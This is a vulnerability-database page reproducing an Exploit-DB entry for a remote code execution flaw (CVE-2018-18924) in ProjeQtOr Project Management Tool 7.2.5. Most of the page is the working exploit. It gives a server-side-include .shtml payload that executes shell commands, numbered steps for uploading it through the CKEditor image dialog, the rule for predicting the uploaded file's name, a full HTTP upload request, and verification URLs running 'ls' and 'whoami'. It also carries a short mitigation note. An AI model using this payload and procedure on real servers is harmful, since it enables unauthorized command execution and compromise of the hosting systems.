header-logo
Suggest Exploit
vendor:
ProjeQtOr Project Management Tool
by:
Özkan Mustafa Akkuş (AkkuS)
8.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: ProjeQtOr Project Management Tool
Affected Version From: 7.2.5 and lower versions
Affected Version To: 7.2.5 and lower versions
Patch Exists: YES
Related CWE: CVE-2018-18924
CPE: a:projeqtor:projeqtor_project_management_tool
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP for Linux 7.2.8-0
2018

ProjeQtOr Project Management Tool 7.2.5 – Remote Code Execution

ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary 'shtml' files which leads to a remote command execution on the remote server. An attacker can create a file with HTML code and save it as .shtml, login to ProjeQtOr portal as priviliage user, click (Image) button on Content panel, choose Upload section and browse the .shtml file, click 'Send it to Server'. The file will be sent to the server and the attacker can find the file by using the formula Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name. The uploaded images are sent under the '/files/images/' folder and the attacker can verify the exploit by using http://domain/files/image/20181023010230_1_RCE.shtml?ls

Mitigation:

Ensure that the application is up to date and patched with the latest security updates. Restrict access to the application and limit the privileges of the users.
Source

Exploit-DB raw data:

# Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
# Date: 2018-10-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.projeqtor.org
# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV7.2.5.zip/download
# Version: v7.2.5
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# CVE: CVE-2018-18924
# Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which
# leads to a remote command execution on the remote server.

# 1) Create a file with the below HTML code and save it as .shtml

<html>
<script>
function fex()
{
document.location.href="<!--#echo var=DOCUMENT_NAME
-->?"+document.getElementById('komut').value;
}
</script>
<!--#exec cmd=$output -->
</html>

# 2) Login to ProjeQtOr portal as priviliage user
# 3) You can perform this operation in the ckeditor fields.
# 4) Click (Image) button on Content panel.
# 5) Chose Upload section and browse your .shtml file.
# 6) Click "Send it to Server". Script will give you "This file is not a valid image." error.
# But it will send the file to the server. Just we need to find the file.
# 7) We can read how the uploaded files are named in the
# "/tool/uploadImage.php" file.(line 90)

<?php
$fileName=date('YmdHis').'_'.getSessionUser()->id.'_'.$uploadedFile['name'];
?>

# 8) The name of our file should be;

Y = Years, numeric, at least 2 digits with leading 0
m = Months, numeric
d = Days, numeric
H = Hours, numeric, at least 2 digits with leading 0
i = Minutes, numeric
s = Seconds, numeric

# We must save the date and time of the upload moment.

Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name

# For Example; If you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30
# the file name will be "20181023010230_1_RCE.shtml"

# 9) Finaly all uploaded images are sent under the "/files/images/" folder.
# 10) Verift the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami

The request:

POST
/tool/uploadImage.php?CKEditor=result&CKEditorFuncNum=80&langCode=en
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/view/main.php
Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696;
ckCsrfToken=7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n;
PHPSESSID=bc0a9f0a918ccf0deae6de127d9b73e0
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------1783728277808111921873701375
Content-Length: 550
-----------------------------1783728277808111921873701375
Content-Disposition: form-data; name="upload"; filename="RCE.shtml"
Content-Type: text/html

[shtml file content]
-----------------------------1783728277808111921873701375
Content-Disposition: form-data; name="ckCsrfToken"

7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n
-----------------------------1783728277808111921873701375--

HTTP/1.1 200 OK
Date: Mon, 23 Oct 2018 01:02:30 GMT

Navigation

Suggest Exploit

Services By CQR